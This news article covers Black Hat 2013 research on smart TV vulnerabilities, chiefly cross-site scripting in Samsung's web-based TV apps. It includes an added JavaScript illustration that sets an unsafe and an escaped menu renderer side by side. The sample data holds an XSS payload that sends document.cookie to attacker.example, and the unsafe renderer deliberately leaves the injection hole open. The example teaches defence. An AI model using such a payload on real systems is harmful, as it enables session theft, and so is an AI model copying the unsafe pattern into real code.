Black Hat 2013: Researchers Demo How Smart TVs Can Watch You

"You can do whatever you want on a smart TV because it's just a regular PC", says Seungjin Lee, a researcher from Korea University. "So you could do hijacking, keylogging when the users are web surfing, (and) sniffing traffic."

In his talk, Lee explained techniques an attacker could use to gain and maintain persistent shell access to most smart TVs, remotely or locally, and ways to leverage that access to keep tabs on users through what most would view as an innocuous device. Meanwhile, Aaron Grattafiori and Josh Yavor of iSEC Partners gave a similar presentation on their research into Samsung TVs, which turned up a number of vulnerabilities that they reported late last year and that the manufacturer fixed this year.

The duo's key finding was that the apps running on Samsung TVs, and likely those of other manufacturers, are web apps, and they carry all the vulnerability baggage that traditional web applications bring with them.

"So this is JavaScript and this is loading the JavaScript app. This whole thing is a web app", said Grattafiori, senior security engineer, pointing to a demo screen showing a Samsung smart TV menu. "Those boxes, your menu when you move your mouse around, that's all DIVs. And a lot of those files are encrypted and decrypted at runtime."

According to the pair, many of the Samsung apps they examined were rife with common web vulnerabilities such as cross-site scripting flaws, which allowed remote, arbitrary code execution on the television. Many of the existing apps could also be turned to malicious ends. For example, a download API could be made to upload content as well, giving an attacker the opportunity to pull any file off the TV, from online credentials to stored content such as photos or other sensitive material.
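The class of flaw described here, rendered in the terms of the DIV-based menu Grattafiori demonstrated, as an added illustration that is not iSEC's findings or any Samsung code: a constructed menu renderer takes app titles from an untrusted catalogue and interpolates them straight into markup, so a crafted title becomes script running with the TV app's privileges. The hardened variant escapes the value for the HTML context it lands in. The function names, the `SAMPLE_APPS` catalogue and the `attacker.example` host are all assumptions made up for the example.

```javascript
// Added example, not code from the page or from iSEC/Samsung.
// Scenario (constructed): a TV app menu built from DIVs, where each tile's
// title comes from a remote catalogue the TV does not control.

// Constructed sample catalogue. The second entry is a crafted title that
// would execute on a vulnerable renderer and ship the app's cookies out.
const SAMPLE_APPS = [
  { id: 'weather', title: 'Weather' },
  {
    id: 'evil',
    title: '<img src=x onerror="fetch(\'http://attacker.example/?c=\'+document.cookie)">',
  },
];

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: untrusted title and id are concatenated into markup verbatim.
// Assigning this string to a DIV's innerHTML runs the attacker's onerror handler.
function renderMenuUnsafe(apps) {
  return apps
    .map((a) => `<div class="tile" data-id="${a.id}">${a.title}</div>`)
    .join('');
}

// Hardened: every untrusted value is escaped for the context it is placed in
// (attribute value and element text both handled by escapeHtml).
function renderMenuSafe(apps) {
  return apps
    .map((a) => `<div class="tile" data-id="${escapeHtml(a.id)}">${escapeHtml(a.title)}</div>`)
    .join('');
}

// Stand-in for a browser: strip the DIV tags the template itself emits and
// report whether any other tag opener survived, i.e. whether markup was injected.
function containsInjectedMarkup(html) {
  const withoutTemplateDivs = html.replace(/<\/?div[^>]*>/g, '');
  return withoutTemplateDivs.includes('<');
}

// Usage: compare both renderers on the same catalogue.
console.log('unsafe injected:', containsInjectedMarkup(renderMenuUnsafe(SAMPLE_APPS))); // true
console.log('safe injected:  ', containsInjectedMarkup(renderMenuSafe(SAMPLE_APPS)));   // false
```

The same escaping discipline applies to the `data-id` attribute: a catalogue entry with a quote in its id could otherwise break out of the attribute and add an event handler to the tile itself, which is why the safe renderer escapes both fields rather than only the visible title.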

Grattafiori believes TV manufacturers need to up their game with some kind of cross-platform security and to train their developers in secure coding. In the meantime, consumers should be wary.

"Consider where you have the TV aimed - maybe your bed is not the best option", he says. "Browse carefully and think about investing in sticky notes to stick over the camera."
